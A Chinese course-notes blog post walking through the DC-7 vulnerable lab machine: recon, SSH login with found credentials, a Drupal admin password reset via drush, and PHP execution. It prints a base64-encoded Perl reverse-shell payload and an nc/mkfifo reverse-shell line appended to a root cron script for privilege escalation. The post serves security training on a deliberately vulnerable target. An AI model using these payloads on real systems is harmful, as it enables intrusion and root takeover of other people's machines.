[网络安全学习篇75]：渗透测试实战-DC-7-靶机入侵

引言：我的系列博客[网络安全学习篇]上线了，小编也是初次创作博客，经验不足；对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙，其实看到目录有300多集的时候，讲道理，有点怂了，所以我就想到了通过写博客（课程笔记）的形式去学习它，虽然写博客会让我多花几倍的时间去学习它，但是当我完成一篇博客所获得的成就感和你们对于我的认同感，让我很满足，能够鼓励我一天天的坚持下去，也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白，大部分知识点都是初次接触，出现对其理解不深入，不完整，甚至也会出现错误有问题的地方，希望大家谅解、留言提出指正，同时也欢迎大家来找我一起交流学习！！！

 

往期博客：

第一阶段：

[网络安全学习篇1]：windowsxp、windows2003、windows7、windows2008系统部署（千峰网络安全视频笔记）

[网络安全学习篇24]：漏洞与木马（千峰网络安全视频笔记 p117-p118）

第二阶段：

[网络安全学习篇25]：初识Linux及简单命令

[网络安全学习篇32]：Linux脚本编写汇总及应用

第三阶段：

[网络安全学习篇33]：0基础带你入门python

[网络安全学习篇38]：基础环境搭建

[网络安全学习篇39]：HTML标签基础 常用的标签 表格

[网络安全学习篇42]：靶场环境搭建（ubuntu系统安装优化及vulhub安装）

[网络安全学习篇43]：PHP基础+变量 运算符 流程控制语句

[网络安全学习篇48]：JS 基础 函数 事件）

第四阶段：

[网络安全学习篇49]：渗透测试方法论

[网络安全学习篇50]：Web架构安全分析

[网络安全学习篇51]：信息收集

[网络安全学习篇52]：扫描技术

[网络安全学习篇53]：口令破解

[网络安全学习篇54]：SQL注入

[网络安全学习篇55]：SQL自动化注入

[网络安全学习篇56]：XSS

[网络安全学习篇57]：XSS（二）

[网络安全学习篇58]：PHP代码注入

[网络安全学习篇59]：OS命令注入

[网络安全学习篇60]：文件上传

[网络安全学习篇61]：文件包含

[网络安全学习篇62]：CSRF 攻击

[网络安全学习篇63]：SSRF

[网络安全学习篇64]：业务安全

[网络安全学习篇65]：提权

[网络安全学习篇66]：Metasploit(MSF)

[网络安全学习篇67]：python poc-exp

[网络安全学习篇68]：反序列化漏洞

[网络安全学习篇69]：渗透测试实战-DC-1-靶机入侵

[网络安全学习篇70]：渗透测试实战-DC-2-靶机入侵

[网络安全学习篇71]：渗透测试实战-DC-3-靶机入侵

[网络安全学习篇72]：渗透测试实战-DC-4-靶机入侵

[网络安全学习篇73]：渗透测试实战-DC-5-靶机入侵

[网络安全学习篇74]：渗透测试实战-DC-6-靶机入侵

[网络安全学习篇75]：渗透测试实战-DC-7-靶机入侵（本篇）

下期博文：

[网络安全学习篇76]：渗透测试实战-DC-8-靶机入侵

 

目录

信息收集

反弹shell

提权

---

信息收集

nmap -A 192.168.1.170 -p- -oN nmap.A

 

whatweb 192.168.1.170

 

发现其为drupal 框架，尝试使用MSF 对于这个框架最新的几个攻击模块，攻击失败

 

进入80端口开放的网站

 

尝试使用谷歌搜索@DC7USER

 

 

 

在这里我们得到账密 [dc7user/MdR3xOgB7#dW]

尝试使用 [dc7user/MdR3xOgB7#dW]账密登录

ssh [email protected]

ssh 远程登录成功

 

 

测试是否存在默认用户admin

 

存在admin

 

drush

通过查询可知drush 命令可以对任意用户密码进行更改

drush user-password admin --password="123456"

 

手动安装 PHP filter 模块

 

 

 

 

测试能否执行php 语句

 

 

编辑，并保存

执行失败，查看内容发现php语句被修饰

 

去掉修饰字符，再次点击提交（save）

php 语句被执行

 

反弹shell

 

php 反弹shell 代码

'perl','c'=>'c');

$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".

"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".

"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".

"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".

"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".

"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".

"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

cf('/tmp/.bc',$back_connect);

$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");

?>

参考自：https://www.jb51.net/article/17844.htm

 

反弹成功

 

 

提权

在前面我们在dc7user 用户的mail (/var/mail/dc7user)下可以发现存在计划任务

cat /var/mail/dc7user

查看一下backups.sh 的权限，发现 但当前用户 www-data 用户具有写权限，我们通过写权限在该文件中添加反弹shell 指令，当root 用户根据其系统计划任务执行backups.sh 脚本时，会反弹root 的shell

在 /opt/scripts 目录下

反弹执行代码

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.164 1234 >/tmp/f" >> backups.sh

 

等待。。。

 

反弹成功

 

拿到flag